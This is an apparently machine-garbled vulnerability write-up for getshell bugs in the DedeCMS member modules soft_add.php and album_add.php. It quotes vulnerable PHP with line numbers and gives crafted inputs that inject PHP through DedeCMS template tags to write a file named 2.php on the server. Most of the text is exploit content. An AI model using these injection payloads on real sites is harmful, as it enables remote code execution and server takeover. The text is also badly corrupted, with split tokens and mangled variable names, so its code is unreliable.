Getshell/member/soft_add.php 156 in gpc off if ($ softurl1! = '') 157 {158 $ urls. = "{dede: link islocal = '1' text = '{$ servermsg1}'} $ softurl1 {/dede: link} \ r \ n "; 159} among them, $ servermsg1 enters the $ url without filtering and constructs $ servermsg1 = '} x {/dede: link} {dede: yy520 name \ = "'] = 0; fputs (fopen ('2. php ', 'w'), 'justforfun'); // "} yy520 {/dede: yy520} under plus, a 2. php getshellmember/album_add.php92 if ($ formhtml = 1) 93 {94 $ imagebody = stripslashes ($ imagebody) When $ pai_mb_rmdown is N; // ignore gpc for 95 $ imgur Ls. = GetCurContentAlbum ($ imagebody, $ copysource, $ litpicname); 96 if ($ ddisfirst = 1 & $ litpic = ''&&! Empty ($ litpicname) 97 {98 $ litpic = $ litpicname; 99 $ hasone = true; 100} 101} 102 $ info = ''; enter GetCurContentAlbumfunction GetCurContentAlbum ($ body, $ rfurl, & $ firstdd) 28 {29 global $ pai_multi_site, $ pai_basehost, $ ddmaxwidth, $ pai_basedir, $ pagestyle, $ pai_mb_rmdown, $ title, $ pai_ml, $ pai_user_dir; 30 include_once (DEDEINC. "/dedecollection. func. php "); 31 if (empty ($ ddmaxwidth) $ ddmaxwidth = 240; 32 $ r Simg = ''; 33 $ basehost =" http ://". $ _ SERVER ["HTTP_HOST"]; 34 $ img_array = array (); 35 preg_match_all ("/(src | SRC) = [\" | '|] {0 ,} (http: \/([^>] *) \. (gif | jpg | png)/isU ", $ body, $ img_array); 36 $ img_array = array_unique ($ img_array [2]); 37 $ imgUrl = $ cfg_user_dir. "/". $ export _ml-> M_ID; 38 $ imgPath = $ export _basedir. $ imgUrl; 39 if (! Is_dir ($ imgPath. "/") 40 {41 MkdirAll ($ imgPath, $ GLOBALS ['cfg _ dir_purview']); 42 CloseFtp (); 43} 44 $ milliSecond = MyDate ("ymdHis", time (); 45 foreach ($ img_array as $ key => $ value) 46 {47 if (preg_match ("#". $ basehost. "# I", $ value) 48 {49 continue; 50} 51 if ($ pai_basehost! = $ Basehost & preg_match ("#". $ cfg_basehost. "# I", $ value) 52 {53 continue; 54} 55 if (! Preg_match ("# ^ http: \// # I", $ value) 56 {57 continue; 58} 59 if ($ pai_mb_rmdown = 'y ') {...........} 93 else 94 {95 $ rsimg. = "{dede: img ddimg = '$ value' text = ''width = '0' height = '0'} $ value {/dede: img} \ r \ n "; 96} 97} 98 return $ rsimg; 99} construct formhtml as 1imagabody as src = http: // {/dede: img} {dede: yy520 name \ = "'] = 0; fputs (fopen ('2. php ', 'w'), 'justforfun'); // "} yy520 {/dede: yy5202.16.jpg